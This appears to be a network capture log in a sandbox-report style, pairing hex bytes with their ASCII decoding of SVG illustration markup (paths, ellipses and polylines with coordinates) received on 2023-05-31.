                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4110INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4126INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                                        Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4142INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                                        Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4158INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4174INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4190INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4206INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4222INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4270INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4286INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4302INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4318INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4334INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4350INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4366INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4382INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4398INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
